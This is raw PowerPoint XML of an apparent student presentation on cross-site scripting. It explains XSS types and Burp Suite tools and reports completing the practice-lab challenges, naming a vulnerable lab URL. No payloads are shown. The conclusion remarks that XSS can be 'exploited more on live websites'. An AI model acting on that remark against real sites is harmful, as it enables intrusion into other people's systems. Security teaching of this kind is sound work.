                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 3(DOM XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272283" y="3304273"/>
            <a:ext cx="5790928" cy="3372822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1545221124"/>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96844" y="639581"/>
            <a:ext cx="3198311" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 3(Stored XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2939946" y="1051863"/>
            <a:ext cx="6654814" cy="3300681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2939946" y="4829063"/>
            <a:ext cx="6801612" cy="773247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Completion of all Labs of DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3686856505"/>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765CF3-B6DA-4882-B634-65FF8A2C464F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12094346" cy="1207364"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{84AB425F-EB51-4A25-93B8-4B1DBDD62B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338352" y="1429785"/>
            <a:ext cx="11417642" cy="4971014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>So, in the end I would like to conclude that every vulnerability over internet affects a lot to the respective application and XSS is one of those vulnerabilities which have affected internet the most. We shall use the minimum number of parameters as increasing the number of parameter means increasing the chances of vulnerability. The effect of XSS though also depends on what type of XSS it is and on what application it is getting tested. XSS is a versatile attack vector which opens the door to a large number of social-engineering and client-side attacks. After exploiting XSS vulnerability, it shows a clear result that we must analyze the content of web pages to ﬁnd patterns that allow identifying if their programming contains XSS type scripts. As a result of this, the executable content, the text ﬁltering rules, the string analysis and the web query analysis, are some of the proposals that we have found among the most common to mitigate attacks of XSS vulnerability. It can further be exploited more on live websites. As security consultants, we should do our best to explain the risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4590557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A94F9B-3398-4648-B4D0-584F0CF43393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420129" y="2001794"/>
            <a:ext cx="11219935" cy="2570205"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="9600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39371543"/>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00D5124-6318-46E6-ABAA-8FBD3CC2C174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599460" y="1799951"/>
            <a:ext cx="10816590" cy="3994132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A webpage often contains some parameters in which we have to enter some values and those values are processed by the server and the server returns us the output. In case the parameter is not sanitized then someone may send some malicious code that could be executed on the server and may lead to destruction or compromisation of the data of user or maybe the privacy of user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS is one of the deadliest attacks if a professional hacker performs it. Hence, it is a necessity for any project to have least XSS vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{393F9C19-4FD4-4DD8-ACD8-A4EED2C6391A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719724" y="433685"/>
            <a:ext cx="10696326" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>CROSS SITE SCRIPTING (XSS)</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425814779"/>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C32FD7A-74B0-445F-8909-043EEF8EEA07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593123" y="1487515"/>
            <a:ext cx="10960123" cy="4740290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>– It arises when a parameter entered by user gets reflected in the response in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> way values.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>– Stored XSS arises when the data sent by user through request is received by the server and is stored and sent to the users without sanitizing the parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM-Based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>- DOM-based XSS arises when the server takes the DOM objects in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>and processes them and have them in response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{416FE53B-C8DF-4482-B8AA-BF513827C75A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106381" y="341764"/>
            <a:ext cx="5293437" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>TYPES OF XSS</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6823816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771FCB4-9B5D-4C36-990B-EE22986B5123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2516189"/>
            <a:ext cx="10515600" cy="3891594"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Burp suite is a tool used to perform web penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the most popular tool among professional web app security researchers and bug bounty hunters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It is a collection of tools which have their own uses like spider the website, changing the request, repeating the request or even repeating the request. Or decoding the codes with the tools like spider, interceptor, decoder, sequencer etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1CDA355C-70E7-4AE5-8215-5E41709AD3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589415" y="450217"/>
            <a:ext cx="6346417" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TOOL DESCRIPTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN"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Burp Suite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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710688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38CFC26-BBB2-465D-8C20-46E4E2A66CFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475879" y="2112886"/>
            <a:ext cx="11375809" cy="4208016"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Spider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- It is a web crawler that is used to map the target web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- Burp Suite contains an intercepting proxy that lets the user see and modify the contents of requests and responses while they are in transit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- This is used to run a set of values through an input point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- Repeater lets a user send requests repeatedly with manual modifications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Sequencer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- The sequencer is an entropy checker that checks for the randomness of tokens generated by the webserver. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Decoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- Decoder lists the common encoding methods like URL, HTML, Base64, Hex, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- It scans the website automatically for many common vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{41F260EC-E554-4263-AC4E-10A07270002F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443796" y="443210"/>
            <a:ext cx="9304407" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Different tools in Burp Suite</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403426638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ED1583F-4E34-43F3-B7BA-FEFF6930B0BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340494" y="1111147"/>
            <a:ext cx="11511009" cy="5499717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>I have exploited XSS vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1"/>
              <a:t>Leettime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> Lab and  DVWA Lab and completed all its challenges. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" u="sng" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>leettime.net/xsslab1/chalg1.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
